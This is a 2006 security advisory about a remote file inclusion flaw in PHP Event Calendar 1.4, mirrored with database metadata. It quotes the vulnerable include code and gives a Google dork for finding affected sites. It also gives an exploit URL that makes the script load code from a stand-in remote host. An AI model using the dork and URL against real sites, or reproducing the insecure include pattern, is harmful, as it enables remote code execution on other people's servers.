PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion

2006-07-24T00:00:00

Description

#############################SolpotCrew Community################################ # # PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion # # Vendor site : http://www.softcomplex.com/products/php_event_calendar/ # ################################################################################# # # # Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006) # # contact: chris_hasibuan@yahoo.com # # Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt # ################################################################################ # # # Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja , # L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa # home_edition2001 , Anggands , Rendy , cow_1seng # and all crew #mardongan @ irc.dal.net # # ############################################################################### Input passed to the "path_to_calendar" is not properly verified before being used to include files. This can be exploited to execute arbitrary PHP code by including files from local or external resources. code from calendar.php if(!$path_to_calendar){ $path_to_calendar = $_path_to_calendar; } extract($HTTP_POST_VARS); extract($HTTP_GET_VARS); include_once $path_to_calendar.'db.php'; function show_calendar($index_calendar='') { global $db,$path_to_data,$settings; Google dork : inurl:/cl_files/ exploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode ##############################MY LOVE JUST FOR U RIE######################### ######################################E.O.F##################################

{"id": "SECURITYVULNS:DOC:13557", "bulletinFamily": "software", "title": "PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion", "description": "#############################SolpotCrew Community################################\r\n#\r\n# PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion \r\n#\r\n# Vendor site : http://www.softcomplex.com/products/php_event_calendar/\r\n#\r\n#################################################################################\r\n#\r\n#\r\n# Bug Found By :Solpot a.k.a (k. Hasibuan) (13th july 2006)\r\n#\r\n# contact: chris_hasibuan@yahoo.com \r\n# \r\n# Website : http://www.solpotcrew.org/adv/solpot-adv-01.txt\r\n#\r\n################################################################################\r\n#\r\n#\r\n# Greetz: choi , h4ntu , Ibnusina , Lappet_tutung , ilalang23 , r4dja , \r\n# L0sTBoy , Matdhule , setiawan , m3lky , NpR , Fungky , barbarosa\r\n# home_edition2001 , Anggands , Rendy , cow_1seng\r\n# and all crew #mardongan @ irc.dal.net\r\n#\r\n#\r\n###############################################################################\r\nInput passed to the "path_to_calendar" is not properly verified \r\nbefore being used to include files. This can be exploited to execute \r\narbitrary PHP code by including files from local or external resources.\r\n\r\ncode from calendar.php\r\n\r\nif(!$path_to_calendar){\r\n $path_to_calendar = $_path_to_calendar;\r\n}\r\nextract($HTTP_POST_VARS);\r\nextract($HTTP_GET_VARS);\r\ninclude_once $path_to_calendar.'db.php';\r\nfunction show_calendar($index_calendar='') {\r\n global $db,$path_to_data,$settings;\r\n\r\nGoogle dork : inurl:/cl_files/\r\n\r\nexploit : http://somehost/path_to_cl_files/calendar.php?path_to_calendar=http://evilcode\r\n\r\n\r\n##############################MY LOVE JUST FOR U RIE#########################\r\n######################################E.O.F##################################\r\n\r\n", "published": "2006-07-24T00:00:00", "modified": "2006-07-24T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:13557", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:18", "edition": 1, "viewCount": 104, "enchantments": {"score": {"value": 1.5, "vector": "NONE"}, "dependencies": {"references": []}, "backreferences": {"references": [{"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:6389"]}]}, "exploitation": null, "vulnersScore": 1.5}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659916711, "score": 1659917426}, "_internal": {"score_hash": "24a2d1101fd1dbc288a58b7b711d6532"}}

PHP Event Calendar versi 1.4 &#40;path_to_calendar&#41; Remote File Inclusion

Description

PHP Event Calendar versi 1.4 (path_to_calendar) Remote File Inclusion